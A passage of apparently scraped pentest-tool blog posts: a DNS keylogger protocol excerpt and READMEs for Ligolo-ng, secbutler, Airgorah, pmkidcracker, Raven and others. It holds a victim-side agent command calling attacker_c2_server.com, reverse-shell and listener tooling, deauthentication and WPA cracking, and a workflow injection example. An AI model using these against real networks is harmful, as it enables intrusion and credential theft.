Response Codes

200: OK

If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests

If the client sends a malformed record request, the server will respond with code 201.

202: Non-Existent Connections

If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets

If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204: Reached Max Connections

If the client attempts to create a connection when the max has been reached, the server will respond with code 204.

Dropped Packets

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

Side Notes

Linux

Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger relies on script, so the keylogger won't run in non-interactive shells.

Windows

Repeated Requests

For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process them fine because it discards repeated packets.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

MrHandler - Linux Incident Response Reporting

By: Zion3R β€” February 17th 2024 at 23:30



MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
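
Conceptually, the collection step boils down to running diagnostic commands over SSH and capturing their output, as in the hedged paramiko sketch below. The host, credentials, and command list are hypothetical; the real tool gathers far more data and renders it into an HTML report:

# pip install paramiko
import paramiko

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect("10.0.0.5", username="analyst", password="secret")  # hypothetical

for cmd in ("uname -a", "who -a", "ss -tulpn"):
    _, stdout, _ = client.exec_command(cmd)
    print(f"$ {cmd}\n{stdout.read().decode()}")
client.close()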



π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
$ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py


Report



☐ β˜† βœ‡ KitPloit - PenTest Tools!

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

By: Zion3R β€” February 15th 2024 at 11:30


WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
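
As a rough illustration of the idea (not the tool's actual code), the sketch below harvests words from a target page and writes them out as a candidate wordlist; the target URL is hypothetical:

# pip install requests
import re
import requests

resp = requests.get("https://target-web.com", timeout=10)
text = re.sub(r"<[^>]+>", " ", resp.text)  # crude HTML tag stripping
words = {w.lower() for w in re.findall(r"[A-Za-z][A-Za-z0-9_-]{3,}", text)}

with open("wordlist.txt", "w") as f:
    f.write("\n".join(sorted(words)))
print(f"{len(words)} unique words written")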


Done
  • [x] Scan Static Files.
  • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
  • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

Installation

From Git
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com

From Dockerfile

You can run this application in a container after building the Dockerfile.

docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o

From DockerHub

You can run this application in a container after pulling it from DockerHub.

docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

Usage
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Use Print outputs on terminal screen.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R β€” February 14th 2024 at 11:30

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers. It covers the most-used and tedious tasks commonly performed during cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

[ASCII art banner: secbutler]

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R β€” January 29th 2024 at 11:30


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries which the user would like to run the scanner on, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for 80+ unique regex signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users can modify or add their own signatures in the regexes.json file. If you have any cool signatures that might be helpful for others too and could be flagged at scale, go ahead and make a PR!
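
For illustration, a minimal sketch of this kind of signature scan. It assumes regexes.json maps a signature name to a pattern; the real file may carry extra fields such as severity, so treat the shape as an assumption:

import json
import re

with open("regexes.json") as f:  # assumed shape: {"signature name": "pattern"}
    signatures = json.load(f)

def scan(text):
    findings = []
    for name, pattern in signatures.items():
        for match in re.finditer(pattern, text):
            findings.append((name, match.group()))
    return findings

sample = "aws_access_key_id = AKIAIOSFODNN7EXAMPLE"
for name, value in scan(sample):
    print(f"[{name}] {value}")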

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with an 80+ unique regex signature list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from the response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs/Subdomains and Domains that could be present in an exposed storage bucket, enabling you to have a chance of discovering hidden endpoints, thus giving you an edge over the other traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Raven - CI/CD Security Analyzer

By: Zion3R β€” January 28th 2024 at 11:30


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:

We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd-party integration risks, affecting the most popular project on GitHub and thousands more.
  • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
  • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

Setup && Run

To get started with Raven, follow these installation instructions:

Step 1: Install the Raven package

pip3 install raven-cycode

Step 2: Setup a local Redis server and Neo4j database

docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to set up the environment is by running our provided docker compose file:

git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup

Step 3: Run Raven Downloader

Org mode:

raven download org --token $GITHUB_TOKEN --org-name RavenDemo

Crawl mode:

raven download crawl --token $GITHUB_TOKEN --min-stars 1000

Step 4: Run Raven Indexer

raven index

Step 5: Inspect the results through the reporter

raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.
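
Besides the browser, the graph can also be queried programmatically. The sketch below uses the neo4j Python driver with the connection defaults documented above; the Workflow node label is an assumption about Raven's schema, so adjust it to whatever the indexer actually creates:

# pip install neo4j
from neo4j import GraphDatabase

driver = GraphDatabase.driver("neo4j://localhost:7687",
                              auth=("neo4j", "123456789"))
with driver.session() as session:
    # "Workflow" is an assumed label; inspect the database to confirm.
    for record in session.run("MATCH (w:Workflow) RETURN w.name AS name LIMIT 10"):
        print(record["name"])
driver.close()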

Prerequisites

  • Python 3.9+
  • Docker Compose v2.1.0+
  • Docker Engine v1.13.0+

Infrastructure

Raven is using two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

Usage

The tool contains three main functionalities: download, index, and report.

Download

Download Organization Repositories

usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows

Download Public Repositories

usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000

Index

usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--debug Whether to print debug statements, default: False

Report

usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...

positional arguments:
{slack}
slack Send report to slack channel

options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)

Examples

Retrieve all workflows and actions associated with an organization (the --org-name flag can be repeated for multiple organizations).

raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

Scrape all publicly accessible GitHub repositories.

raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

raven index --debug

Now, we can generate a report using our query library.

raven report --severity high --tag injection --tag unauthenticated

Rate Limiting

For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:

  • Code search - 30 queries per minute
  • Any other API - 5000 per hour
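
If you want to check how much of that quota remains before a long crawl, GitHub exposes a /rate_limit endpoint (the call itself does not count against the core quota). A minimal Python sketch, assuming the requests package is installed and GITHUB_TOKEN is exported; this helper is mine, not part of Raven:

import os
import requests

# Query the authenticated rate-limit status for the current token.
resp = requests.get(
    "https://api.github.com/rate_limit",
    headers={"Authorization": f"Bearer {os.environ['GITHUB_TOKEN']}"},
    timeout=10,
)
core = resp.json()["resources"]["core"]
print(f"core API calls remaining: {core['remaining']}/{core['limit']}")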

Research Knowledge Base

Current Limitations

  • It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
  • It is possible to run an external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
  • It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
  • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

Future Research Work

  • Implementation of taint analysis. Example use case: a user can pass a pull request title (which is an attacker-controllable parameter) to an action parameter named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path to code execution (see the sketch after this list).
  • Expand the research to find harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
  • Research whether actions/github-script has an interesting threat landscape. If so, it can be modeled in the graph.
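
To make the taint-analysis idea above concrete, here is a minimal, hypothetical Python sketch that flags run commands interpolating attacker-controllable expressions. The expression list and matching logic are illustrative only and are not Raven's implementation:

import re

# Expressions an attacker can influence (illustrative, not exhaustive).
CONTROLLABLE = re.compile(
    r"\$\{\{\s*(github\.event\.pull_request\.title"
    r"|github\.event\.issue\.title"
    r"|inputs\.\w+)\s*\}\}"
)

workflow_step = "- run: echo ${{ inputs.data }}"

match = CONTROLLABLE.search(workflow_step)
if "run:" in workflow_step and match:
    print(f"potential injection via {match.group(1)}")  # -> inputs.data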

Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

If you liked Raven, you will probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.

If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form at https://cycode.com/book-a-demo/.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R β€” January 26th 2024 at 11:30


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.

When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.

As an example, for a TCP connection:

  • A SYN is translated to a connect() on the remote host
  • A SYN-ACK is sent back if connect() succeeds
  • An RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED is returned after connect()
  • Nothing is sent on timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).
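
The same mapping can be sketched in a few lines of Python (purely conceptual; Ligolo-ng itself is written in Go on top of gVisor's userland stack):

import errno
import socket

def handle_syn(dst_ip, dst_port):
    # Return the TCP reply the relay should synthesize for an incoming SYN.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(3)
    try:
        s.connect((dst_ip, dst_port))  # SYN -> connect() on the remote host
        return "SYN-ACK"               # connect() succeeded
    except socket.timeout:
        return None                    # nothing is sent on timeout
    except OSError as e:
        if e.errno in (errno.ECONNRESET, errno.ECONNABORTED, errno.ECONNREFUSED):
            return "RST"
        return None
    finally:
        s.close()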

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚              Interface 3              β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€€
β”‚ Name         β”‚ wlp3s0                 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe      β”‚
β”‚ MTU          β”‚ 1500                   β”‚
β”‚ Flags        β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24        β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx Met MTU State Name
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to port 4321 of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners                                                              β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€€
β”‚ # β”‚ AGENT                   β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€€
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234           β”‚ 127.0.0.1:4321         β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent instead.

When using nmap, you should use --unprivileged or -PE to avoid false positives.

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R β€” January 24th 2024 at 11:30


Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!

Legal

Airgorah is designed to be used for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you don't own is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.

Requirements

This software only works on Linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.

Installation

The installation instructions are available here.

Usage

The documentation about the usage of the application is available here.

License

This project is released under MIT license.

Contributing

If you have any question about the usage of the application, do not hesitate to open a discussion.

If you want to report a bug or propose a feature, do not hesitate to open an issue or submit a pull request.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R β€” January 15th 2024 at 11:30


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac and pmkid must be hexstrings, e.g. b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

